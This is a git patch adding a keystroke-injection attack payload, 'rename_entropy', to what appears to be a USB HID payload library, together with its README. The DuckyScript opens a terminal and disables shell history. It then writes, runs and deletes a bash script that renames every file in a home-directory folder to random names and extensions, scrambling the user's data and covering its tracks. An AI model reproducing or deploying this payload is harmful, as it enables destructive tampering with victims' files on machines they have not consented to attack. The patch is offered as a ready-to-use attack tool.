From 6a69592c9652f0f1863c6c17ae43650c19214007 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Sun, 9 Jul 2023 20:00:28 +0530 Subject: [PATCH] uploading rename_entropy payload rename_entropy is a powerful payload which renames target files along with extensions in home directory. --- .../execution/rename_entropy/README.md | 24 +++++++++++++++++++ .../execution/rename_entropy/payload.txt | 22 +++++++++++++++++ 2 files changed, 46 insertions(+) create mode 100644 payloads/library/execution/rename_entropy/README.md create mode 100644 payloads/library/execution/rename_entropy/payload.txt diff --git a/payloads/library/execution/rename_entropy/README.md b/payloads/library/execution/rename_entropy/README.md new file mode 100644 index 0000000..7621b5d --- /dev/null +++ b/payloads/library/execution/rename_entropy/README.md @@ -0,0 +1,24 @@ +## About: +* Title: rename_entropy +* Description: rename_entropy is a powerful payload which renames target files along with extensions in home directory. +* AUTHOR: drapl0n +* Version: 1.0 +* Category: Execution. +* Target: Unix-like operating systems. +* Attackmodes: HID. + +## rename_entropy: rename_entropy is a powerful payload which renames target files along with extensions in home directory. + +### Features: +1. Renames files and directories. +2. Fast paylaod execution. +3. Oneliner Payload. + +### Workflow: +1. Prevent storing history. +2. Creating random string generation mechanism. +3. Granting executing privileges. +4. Executing Payload Script. + +#### Support me if you like my work: +* https://twitter.com/drapl0n diff --git a/payloads/library/execution/rename_entropy/payload.txt b/payloads/library/execution/rename_entropy/payload.txt new file mode 100644 index 0000000..fd1c3d6 --- /dev/null +++ b/payloads/library/execution/rename_entropy/payload.txt @@ -0,0 +1,22 @@ +REM Title: rename_entropy +REM Description: rename_entropy, rename_entropy is a powerful payload which renames target files with extensions. +REM AUTHOR: drapl0n +REM Version: 1.0 +REM Category: Execution. +REM Target: GNU/Linux. +REM Attackmodes: HID. + +DELAY 1000 +CTRL ALT t +DELAY 500 +STRING unset HISTFILE +ENTER +DELAY 100 +STRING echo -e "#\!/bin/bash\ndir=\"/home/\$(whoami)/testdir/\"\ncd \"\$dir\" || exit\nfor file in *; do\n\trand_str=\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 10 | head -n 1)\n\trand_ext=\$(cat /dev/urandom | tr -dc 'a-zA-Z' | fold -w 3 | head -n 1)\n\tmv \"\$file\" \"\${rand_str}.\${rand_ext}\"\ndone" > /tmp/sys +ENTER +DELAY 200 +STRING chmod +x /tmp/sys +ENTER +DELAY 200 +STRING /tmp/./sys && rm /tmp/sys && exit +ENTER